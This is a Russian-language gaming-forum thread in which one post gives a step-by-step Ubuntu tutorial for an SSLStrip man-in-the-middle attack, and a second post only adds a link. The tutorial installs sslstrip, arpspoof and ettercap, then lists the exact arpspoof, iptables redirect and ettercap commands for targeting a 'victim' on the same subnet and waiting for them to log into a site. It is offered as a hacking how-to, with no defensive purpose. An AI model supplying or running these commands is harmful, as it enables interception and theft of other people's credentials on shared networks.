*Drive*- Здесь рулят padonki

*Drive* - Counter Strike Source
It is currently 18 Mar 2019, 21:32

All times are UTC + 3 hours [ DST ]




Post new topic Reply to topic  [ 2 posts ] 
Author Message
PostPosted: 13 Dec 2010, 23:48 
Offline
padonki
User avatar

Joined: 14 Aug 2006, 20:43
Posts: 3659
Location: Солнцево
Has thanked: 9 times
Have thanks: 46 times
SSLStrip Шаг за Шагом на Убунту

В статье http://www.xakep.ru/magazine/xa/125/026/1.asp в принципе всё и понятно написано, но всё же в Убунту есть свои нюансы.

Для дальнейшей работы нам необходимо:

1. SSLStrip
2. arpspoof
3. ettercap
4. ubuntu linux (пример показан на Karmic Koala 9.10)
5. сетевое подключение
6. жертва из той же подсети


Скачаем SSLStrip с сайта http://www.thoughtcrime.org/software/sslstrip/

Вы скачаете архив sslstrip-0.6.tar.gz (версия может быть другая)

Мы же кул хацкеры)))) и будем разархивировать через терминал!
1, Открываем терминал.
2. Заходим в папку с архивом.
3. и пишем своими ручками "tar -zxvf sslstrip-0.6.tar.gz"'
4. заходим в появившуюся папку sslstrip-0.6(всё в терминале)
5. пишем sudo python setup.py build
6. и следующая команда sudo python setup.py install

Всё SSLStrip установлен.

Теперь я покажу как это приблизительно выглядело у меня

sagnat@sagnat-desktop:~$ ls
sagnat@sagnat-desktop:~$ cd Загрузки
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ tar -zxvf sslstrip-0.6.tar.gz
sagnat@sagnat-desktop/Загрузки:~$ ls
sagnat@sagnat-desktop/Загрузки:~$ cd sslstrip-0.6
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ python setup.py build
sagnat@sagnat-desktop/Загрузки/sslstrip-0.6:~$ sudo python setup.py install

Естественно я печать всё, что происходит у меня на компе не буду ну приблизительно установка выглядит так.

Что там у нас по списку?))))

Надо установить arpspoof.
Это всё проще простого)))
Пишем в терминале sudo apt-get install dsniff вводим пароль и всё))

Установка ettercap почти такая же: sudo apt-get install ettercap

Если вы не помните свой IP введите в терминале ifconfig.

Ещё вам будет нужен адрес шлюза это всё узнаётся вот ip route show | grep default | awk '{ print $3}' так.

И наконец самое интересное, откройте в своём терминале 3 вкладки

в одной запустите sudo arpspoof -i eth0 -t <Шлюз>
-i это сетевое соединение
-t это target - цель
выглядит эта форма вот так: sudo arpspoof -i eth0 -t 172.168.1.4 172.168.1.1

в другой введите sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 1000
1000 - это прослушиваемый порт обычно ставиться на 8080
и запускаем sslstrip: sudo sslstrip

ну и в третьей вкладке запускаем ettercap: sudo ettercap -Tqz


Ждём когда жертва войдёт на какой-нибудь сайт.

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Image


Top
 Profile  
 
 Post subject:
PostPosted: 14 Dec 2010, 01:33 
Offline
padonki
User avatar

Joined: 14 Aug 2006, 20:43
Posts: 3659
Location: Солнцево
Has thanked: 9 times
Have thanks: 46 times
http://nnm.ru/blogs/_victor_/ptraffer_- ... na_ubuntu/

_________________
Моя характеристика с детского сада: Хорошо кушает, спит, гуляет! Прошло много лет, ничего не изменилось.
Image


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 2 posts ] 

All times are UTC + 3 hours [ DST ]


Who is online

Users browsing this forum: No registered users and 1 guest


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  


Powered by -=PadonaK=- ®, Forum Drivesource.ru, Статситика игрового ресурса *Drive* HLstatsX, Система забаненых игроков Sourcebans

drivesource.ru ® 2006-2019